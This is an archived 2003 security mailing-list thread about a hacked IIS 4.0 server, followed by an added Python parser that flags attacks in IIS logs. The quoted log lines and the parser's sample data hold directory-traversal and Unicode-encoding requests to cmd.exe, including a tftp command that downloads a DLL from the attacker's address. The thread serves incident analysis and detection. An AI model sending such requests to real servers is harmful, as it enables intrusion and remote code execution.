Re: Hacked web server

From: Tibor Biro (tiborbiro@rogers.com)
Date: 01/13/03

    From: "Tibor Biro" <tiborbiro@rogers.com>
    To: "Rogelio Vidaurri Courcelle" <rvidaurri@haciendachiapas.gob.mx>, <incidents@securityfocus.com>
    Date: Sun, 12 Jan 2003 18:43:08 -0500
    
    

    Looks like your server was hacked by using an old exploit; check out this
    link for more information:
    http://www.securiteam.com/exploits/Additional_details_about_the_IIS_remote_execution_vulnerability.html

    This vulnerability allows the hacker to get to your server through port 80,
    completely bypassing your firewall. You might want to consider installing an
    IDS; Snort comes to mind.

    If I were you, I would reinstall the entire server from scratch; your guest
    might have opened some other doors.

    To trace the hacker you can start by doing a reverse lookup on the address
    you got in the IIS log file.

    If your server is not configured to receive email then your mailroot/drop
    folder should be empty. You can safely delete all files/folders from there.

    Regards,
    Tibor Biro

    ----- Original Message -----
    From: "Rogelio Vidaurri Courcelle" <rvidaurri@haciendachiapas.gob.mx>
    To: <incidents@securityfocus.com>
    Sent: Friday, January 10, 2003 3:39 PM
    Subject: Hacked web server

    Hi... my web server (NT 4.0 SP6a) was hacked last Friday. It has only
    one NIC with a public IP.
    We have an OpenBSD firewall (PF) that filters both incoming and
    outgoing traffic.... this firewall has no IP addresses.....
    External users have access to our web server only on port 80...
    We had a pop-up window on our default page.... I don't know if that's why
    he could hack our server.... I'm not an expert in these things.. I'm a
    beginner.....
    (my English is not perfect, sorry for the inconvenience)...
    Anyway.. we deleted that pop-up window and haven't been hacked again...
    We tried to patch our server but the patch "destroyed" my IIS 4.0 and we
    had to reinstall everything....
    In my log files I have the records of our visits.... and since 2 months
    ago it's been registering this:

    200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0, 72, 275, 403, 5, GET, /scripts/root.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 0, 70, 119, 404, 2, GET, /MSADC/root.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0, 79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 145, 261, 500, 123, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 261, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 16, 97, 275, 403, 5, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..À¯../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..Áœ../winnt/system32/cmd.exe, /c+dir,

    I have read that it could be because of Nimda, but I have scanned with
    the latest pattern and it found no viruses... only a backdoor trojan
    called ncx99.exe dropped in mailroot\drop\temp.
    By the way, can I delete files inside that folder??? There's a
    rundlls32.exe... a KEY file, etcetera......

    What can it be? I need help...
    How could I trace the hacker??
    Thanks in advance.....

    ISC. Rogelio Vidaurri Courcelle
    Área de Sistemas y Web
    Secretaría de Hacienda

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
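The records quoted in the message above are in the comma-separated Microsoft IIS log format (client IP, user, date, time, service, server name, server IP, time taken, bytes received, bytes sent, HTTP status, Win32 status, method, URI stem, URI query). What follows is an added example, not part of the original mail and not anyone's production tooling: a small Python parser that reads lines in that format and flags what those records show, namely `..%5c..` and overlong-UTF-8 traversal out of /scripts and /msadc to cmd.exe, the root.exe copy of cmd.exe, a tftp download in the query string, and the request for the dropped httpodbc.dll. The sample lines are constructed from the quoted ones; the Unicode variants, which the archived copy shows as raw bytes, are written here in percent-encoded form (`%c0%af`, `%c1%9c`, `%c1%1c`) on the assumption that that is how they were sent, and the `%255c` double-decode line and the benign /index.htm line are added for contrast. The decoding order in `iis_decode` (one percent-decode, overlong sequences folded to slashes, a second percent-decode) is a deliberate imitation of the unpatched server's behaviour, not a reimplementation of IIS itself.

```python
"""Added example (not from the original mail): parse Microsoft IIS-format
log records like the ones quoted above and flag traversal, command
execution, tftp drops and the request for the dropped DLL."""
import re
from urllib.parse import unquote, unquote_to_bytes

FIELDS = ["client_ip", "user", "date", "time", "service", "server",
          "server_ip", "time_taken", "bytes_recv", "bytes_sent", "status",
          "win32_status", "method", "uri_stem", "uri_query"]

# Overlong UTF-8 sequences that an unpatched IIS 4/5 turned into '/' or
# '\' only after its "is this path inside the web root" check.
OVERLONG = {b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/",
            b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}

# Constructed sample, modelled on the quoted records (see lead-in).
SAMPLE_LOG = [
    "200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0, 72, 275, 403, 5, GET, /scripts/root.exe, /c+dir,",
    "200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,",
    "200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\\httpodbc.dll,",
    "200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0, 79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -,",
    "200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..%c0%af../winnt/system32/cmd.exe, /c+dir,",
    "200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..%c1%9c../winnt/system32/cmd.exe, /c+dir,",
    "200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 145, 261, 500, 123, GET, /msadc/..%5c../..%5c../..%5c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe, /c+dir,",
    "200.38.237.2, -, 5/01/03, 4:15:12, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..%255c../winnt/system32/cmd.exe, /c+dir,",
    "10.0.0.5, -, 5/01/03, 4:16:00, W3SVC, INGRESOS02, 200.38.152.221, 0, 80, 1342, 200, 0, GET, /index.htm, -,",
]


def parse_record(line):
    """Split one IIS-format record into a dict, or None if malformed."""
    parts = line.strip().rstrip(",").split(", ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def iis_decode(stem):
    """Decode a URI stem the way the vulnerable server effectively did:
    one %xx pass, overlong UTF-8 folded to slashes, then a second %xx pass
    (the double-decode bug); backslashes are normalised to '/'."""
    raw = unquote_to_bytes(stem)
    for seq, slash in OVERLONG.items():
        raw = raw.replace(seq, slash)
    raw = unquote_to_bytes(raw)
    return raw.decode("latin-1").replace("\\", "/")


def escapes_webroot(path):
    """True if the '..' segments climb above the virtual root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(rec):
    """Return (decoded_stem, tags) for one parsed record."""
    tags = []
    stem = rec["uri_stem"]
    decoded = iis_decode(stem)
    if escapes_webroot(decoded):
        tags.append("traversal")
    if re.search(r"%(c[01]|e0%80)%", stem, re.I):   # overlong UTF-8 on the wire
        tags.append("unicode-overlong")
    if "%25" in stem.lower():                        # %255c -> %5c -> '\'
        tags.append("double-decode")
    name = decoded.rsplit("/", 1)[-1].lower()
    if name in ("cmd.exe", "root.exe"):
        tags.append("shell")
    if name == "httpodbc.dll":                       # the name the tftp drop used
        tags.append("dropped-dll")
    query = unquote(rec["uri_query"]).replace("+", " ").lower()
    if query.startswith("/c "):
        tags.append("command")
    if "tftp" in query:
        tags.append("tftp-download")
    return decoded, tags


def analyze(lines):
    """Run the checks over raw log lines; return one finding per hit."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        decoded, tags = classify(rec)
        if tags:
            findings.append({"client": rec["client_ip"], "time": rec["time"],
                             "status": rec["status"], "win32": rec["win32_status"],
                             "decoded": decoded, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['status']}/{f['win32']} "
              f"{f['decoded']} {','.join(f['tags'])}")
```

Reading the status columns alongside the tags is what tells you how far the attacker got: the cmd.exe `/c dir` line with status 200 and 8201 bytes sent is a directory listing going back to the client, while the 403 on root.exe and the 500 on httpodbc.dll are attempts that failed (the Win32 status values 5, 2, 123 and 126 are the standard access-denied, file-not-found, invalid-name and module-not-found codes).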



